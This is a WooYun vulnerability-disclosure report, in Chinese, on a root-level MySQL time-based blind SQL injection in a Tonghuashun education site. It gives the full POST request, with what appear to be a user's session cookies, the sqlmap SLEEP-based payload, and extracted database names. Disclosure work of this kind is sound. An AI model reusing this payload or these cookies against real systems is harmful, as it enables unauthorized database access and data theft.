乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-22: 细节已通知厂商并且等待厂商处理中 2016-03-22: 厂商已经确认,细节仅向厂商公开 2016-04-01: 细节向核心白帽子及相关领域专家公开 2016-04-11: 细节向普通白帽子公开 2016-04-21: 细节向实习白帽子公开 2016-05-06: 细节向公众公开
同花顺某站点MySQL注射(root权限)被动测试大法好
POST /question.php?op=new&vid=11111 HTTP/1.1Host: school.10jqka.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://school.10jqka.com.cn/question.php?op=submitCookie: __utma=156575163.1622041877.1458570243.1458570243.1458570243.1; __utmc=156575163; __utmz=156575163.1458570243.1.1.utmcsr=eeju.10jqka.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/; Hm_lvt_78c58f01938e4d85eaf619eae71b4ed1=1458570246; Hm_lpvt_78c58f01938e4d85eaf619eae71b4ed1=1458574949; user=MDpBYXNyb246NGYyYTNjMzhmYjEzNmZhZjkwYmJmZjE1NTllY2ZkNmU6Tm9uZTo1MDA6MzM3Nzg1NzI0OjcsMTExMTExMTExMTEsNDA7NDQsMTEsNDA7NiwxLDQwOzUsMSw0MDoyNzo6OjMyNzc4NTcyNDoxNDU4NTc0MjI4Ojo6MTQ1ODU3NDE0MA%3D%3D; userid=327785724; u_name=Aasron; escapename=Aasron; ticket=9ef8f7d770dc83445314fa13998847d7; historystock=601328; spversion=20130314; PHPSESSID=joibrrs8227g60ka1co36a69u4Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 47question119=362&question120=364&question121=366
注入参数#1 question119注入参数#2 question120注入参数#3 question111
时间盲注有点慢,我直接贴出部分数据库吧,证明一下,有几个乱码了,但影响不大
Parameter: question119 (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: question119=362' AND (SELECT * FROM (SELECT(SLEEP(5)))ffpI) AND 'gGSE'='gGSE&question120=364&question121=366&vid=11111---[02:51:40] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12
<code>[02:51:40] [INFO] fetching database names[02:51:40] [INFO] fetching number of database[02:51:40] [INFO] resumed: 58[02:51:40] [INFO] resumed: information_schema[02:51:40] [INFO] resumed: 10_bott\x04Am_stoc[02:51:40] [INFO] resumed: 10jqka_info[02:51:40] [INFO] resumed: 163[02:51:40] [INFO] resumed: abc123[02:51:40] [INFO] resumed: analysi\x04B[02:51:40] [INFO] resumed: appdb[02:51:40] [INFO] resumed: baike[02:51:40] [INFO] resumed: bbs_nexus_com_}n[02:51:40] [INFO] resumed: collection[02:51:40] [INFO] resumed: datacenter[02:51:40] [INFO] resumed: datapop[02:51:40] [INFO] resumed: dcxj[02:51:40] [INFO] resumed: fetch_hqB[02:51:40] [INFO] resumed: gwdata[02:51:40] [INFO] resumed: hexinzx[02:51:40] [INFO] resumed: inv\x7fst_comb_new[02:51:40] [INFO] resumed: investigation[02:51:40] [INFO] resumed: k}ngkey[02:51:40] [INFO] resumed: level2_tyzx[02:51:40] [INFO] resumed: \x7fog[02:51:40] [INFO] resumed: log1[02:51:40] [INFO] resumed: logs[02:51:40] [INFO] resumed: lost+found[02:51:40] [INFO] resumed: mysql[02:51:40] [INFO] resumed: nexus[02:51:40] [INFO] resumed: n\x81ke[02:51:40] [INFO] resumed: pass[02:51:40] [INFO] resumed: qu\x04Asti\x04Vn[02:51:40] [INFO] resumed: sales_adm\x04An
</code>
当前数据库用户:[email protected]
过滤
危害等级:高
漏洞Rank:15
确认时间:2016-03-22 13:38
漏洞已经确认,正在进行处理,谢谢。
暂无